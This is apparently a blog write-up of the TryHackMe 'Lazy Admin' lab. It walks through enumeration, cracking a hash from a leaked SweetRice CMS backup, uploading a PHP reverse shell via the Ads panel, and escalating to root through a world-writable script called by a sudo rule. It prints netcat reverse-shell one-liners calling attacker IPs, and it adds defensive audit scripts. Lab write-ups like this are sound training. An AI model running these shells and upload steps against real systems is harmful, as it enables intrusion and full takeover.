Tryhackme — Lazy Admin

Description: Easy Linux machine to practice your skills.

Just going through the original challenges I did when I started THM, each one bringing with it its own memories of “call this easy!!!” and “I’ll never get the hang of this!!”

Either way, they did get easier and I did get the hang of them. So let’s make a start by enumerating as usual:

ping

~ ping -c 4 $IP
PING 10.10.98.231 (10.10.98.231) 56(84) bytes of data.
64 bytes from 10.10.98.231: icmp_seq=1 ttl=63 time=17.0 ms
64 bytes from 10.10.98.231: icmp_seq=2 ttl=63 time=16.9 ms
64 bytes from 10.10.98.231: icmp_seq=3 ttl=63 time=16.9 ms
64 bytes from 10.10.98.231: icmp_seq=4 ttl=63 time=16.7 ms
--- 10.10.98.231 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 16.659/16.881/17.013/0.133 ms

nmap

~ nmap -sV -sC -A $IP    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 10:52 BST
Nmap scan report for 10.10.98.231
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds

gobuster

~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/12 10:56:18 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [--> http://10.10.98.231/content/]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]

===============================================================
2022/09/12 10:56:28 Finished
===============================================================

website

So the website we have on port 80 appears to be the default Apache2 Ubuntu page:

However with the gobuster check indicating that a content folder exists, we can look at that:

gobuster 2 — the sequel

With the content folder found, we can check for additional SweetRice directories.

~ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.231/content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/12 11:00:56 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [--> http://10.10.98.231/content/_themes/]
/as (Status: 301) [Size: 317] [--> http://10.10.98.231/content/as/]
/attachment (Status: 301) [Size: 325] [--> http://10.10.98.231/content/attachment/]
/images (Status: 301) [Size: 321] [--> http://10.10.98.231/content/images/]
/inc (Status: 301) [Size: 318] [--> http://10.10.98.231/content/inc/]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [--> http://10.10.98.231/content/js/]

===============================================================
2022/09/12 11:01:04 Finished
===============================================================

This provides us with some additional threads we can investigate. Firstly we can check /as, which gives us a login screen.

Next, as part of the continued enumeration, we check /inc, which gives us a list of files:

One that stands out is the backup folder:

We download that and a quick search provides us with a username and hashed password:

cat mysql_bakup_20191129023059-1.5.1.sql | grep passw
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"m******r\\";s:6:\\"passwd\\";s:32:\\"42f74************f475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

Checking the hash and putting it quickly through crackstation.net, we get the password.
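The value the grep above pulls out is a PHP-serialized array; the admin name and password hash are two of its fields. The following added example (not from the original writeup) parses that format properly and reports what a leaked backup exposes, so a defender can check their own dumps instead of eyeballing the line. The sample blob is constructed with a placeholder hash; in a real backup the blob is wrapped in SQL and PHP quoting that must be unescaped first.

```python
import re

def php_unserialize(data: str, pos: int = 0):
    """Minimal PHP unserialize for s:, i:, N; and a: values.
    Returns (value, position after the value)."""
    tag = data[pos]
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag == "i":                                   # i:123;
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == "s":                                   # s:len:"bytes";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if tag == "a":                                   # a:count:{key value ...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        p, out = colon + 2, {}                       # skip :{
        for _ in range(count):
            key, p = php_unserialize(data, p)
            val, p = php_unserialize(data, p)
            out[key] = val
        return out, p + 1                            # skip }
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def audit_global_setting(blob: str) -> dict:
    """Summarise the credential-bearing fields of SweetRice's global_setting row.
    The hash check is length-based: a bare 32-hex digest is MD5-sized and unsalted,
    which is exactly what an online lookup table cracks."""
    settings, _ = php_unserialize(blob)
    pw = settings.get("passwd") or ""
    return {
        "admin": settings.get("admin"),
        "hash_looks_like_unsalted_md5": bool(re.fullmatch(r"[0-9a-f]{32}", pw)),
        "admin_email_set": settings.get("admin_email") is not None,
        "site_closed": settings.get("close") == 1,
    }

# Constructed sample in the shape of the backup's global_setting value (placeholder hash).
SAMPLE = (
    'a:5:{s:4:"name";s:12:"Demo Website";s:5:"admin";s:9:"demoadmin";'
    's:6:"passwd";s:32:"0123456789abcdef0123456789abcdef";'
    's:5:"close";i:1;s:11:"admin_email";N;}'
)

if __name__ == "__main__":
    print(audit_global_setting(SAMPLE))
```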

Using the credentials we gain access to the SweetRice admin panel. Luckily it provides us with the current version: 1.5.1, so a quick search on searchsploit provides us with the following:

~ searchsploit sweetrice
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

So from this we can see that the backup disclosure is where we got the initial username and password from. Another, 40700 (CSRF / PHP code execution), looks as though it could give us a reverse shell. Checking it out, we find:

~ searchsploit -x php/webapps/40700.html
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server

So clicking on Ads gives us the opportunity to add a PHP reverse shell.

Using pentestmonkey's php-reverse-shell.php and amending the file accordingly for our attacker box, we get:

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.11.12.13'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;

Now we give the ad a name and finalise it with a click on Done.

Remembering our second gobuster scan, we found the folder ads (under inc), and if we visit it we can see our click_me.php file. Now, before we exploit it, a quick netcat session on the port we selected — 4444.

nc -nlvp 4444      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And a quick curl command should start the reverse shell.

curl http://10.10.98.231/content/inc/ads/click_me.php

There we have it — the initial foothold on the machine.

nc -nlvp 4444      
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.98.231.
Ncat: Connection from 10.10.98.231:60346.
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:35:35 up 52 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Making the shell interactive:

python -c 'import pty;pty.spawn("/bin/bash")' # then press Ctrl+Z
stty raw -echo;fg # then press ENTER twice
export TERM=xterm

Let’s find out who is on the machine with a quick check of the home folder:

Further checks then provide us with the user flag.

Next then, what can we actually do as the user www-data? A quick sudo -l gives us:

www-data@THM-Chal:/$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Checking out the file, we see from the ls -l we did earlier that we can read and execute it but not write to it. However, it runs a further script, copy.sh:

-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
www-data@THM-Chal:/$ cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");

Checking that file, it actually contains a bash reverse shell, and the ls -l shows it is world-writable! From this, all we need to do is amend the file to point at our attacker box and we are in with a root shell.

www-data@THM-Chal:/$ ls -l /etc/copy.sh 
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
www-data@THM-Chal:/$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

In this case I used echo to get the data across, then set up a netcat session on port 5555 and ran the file with my sudo credentials.

www-data@THM-Chal:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.56.134 5555 >/tmp/f" > /etc/copy.sh
www-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/backup.pl
================================
nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.98.231.
Ncat: Connection from 10.10.98.231:44210.
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{*************************}
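The root path here is a chain: sudo lets www-data run perl on backup.pl as root, backup.pl runs /etc/copy.sh, and copy.sh is world-writable, so the sudo rule effectively grants root to anyone who can write that file. The added example below (not from the original writeup) is the check an administrator would run over such a rule: it follows interpreter -> script -> referenced files and reports every link that group or world can write. The file tree it audits is constructed in a temp directory with the same permissions as the box; the sudo rule text is the one from sudo -l above.

```python
import os
import re
import stat
import tempfile

RULE = "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"   # from sudo -l on the box
PATH_RE = re.compile(r"/[\w./-]+")                            # absolute paths inside a script
CMD_RE = re.compile(r"\)\s*(?:\w+:\s*)*(.+)$")                # command part after (runas) and tags

def writable_by_others(path: str) -> bool:
    """Group- or world-writable: any non-root user in that set can change what root runs."""
    return bool(os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudo_rule(rule: str, root: str = "") -> list:
    """Walk interpreter -> script -> referenced files for one sudoers command.
    `root` is prefixed to every path so the check can run against a copied or constructed tree."""
    m = CMD_RE.search(rule)
    if not m:
        return ["unparsable rule: " + rule]
    queue = [w for w in m.group(1).split() if w.startswith("/")]
    seen, findings = set(), []
    while queue:
        path = queue.pop(0)
        real = root + path
        if path in seen or not os.path.isfile(real):
            continue
        seen.add(path)
        if writable_by_others(real):
            findings.append(f"{path} is writable by group/other")
        with open(real, "rb") as fh:
            head = fh.read(65536)
        if b"\0" in head:            # binary such as /usr/bin/perl: do not mine it for paths
            continue
        queue.extend(PATH_RE.findall(head.decode(errors="replace")))
    return findings

def build_demo_tree() -> str:
    """Constructed copy of the box's chain: backup.pl is -rw-r--r-x, copy.sh is -rw-r--rwx.
    copy.sh gets a harmless body; only its permissions matter to the audit."""
    root = tempfile.mkdtemp()
    for rel, mode, body in [
        ("/home/itguy/backup.pl", 0o645, '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n'),
        ("/etc/copy.sh", 0o647, "#!/bin/sh\ncp -a /var/www /backup\n"),
    ]:
        os.makedirs(os.path.dirname(root + rel), exist_ok=True)
        with open(root + rel, "w") as fh:
            fh.write(body)
        os.chmod(root + rel, mode)
    return root

def demo() -> list:
    return audit_sudo_rule(RULE, build_demo_tree())

if __name__ == "__main__":
    print("\n".join(demo()) or "no writable links found")
```

Fixing the finding means chmod o-w /etc/copy.sh (and keeping it root-owned); the sudo rule itself is only as safe as every file in that chain.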

A great little box, that I thoroughly enjoyed, but when I first started? Not so much. See how things change!!

James Pearson

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.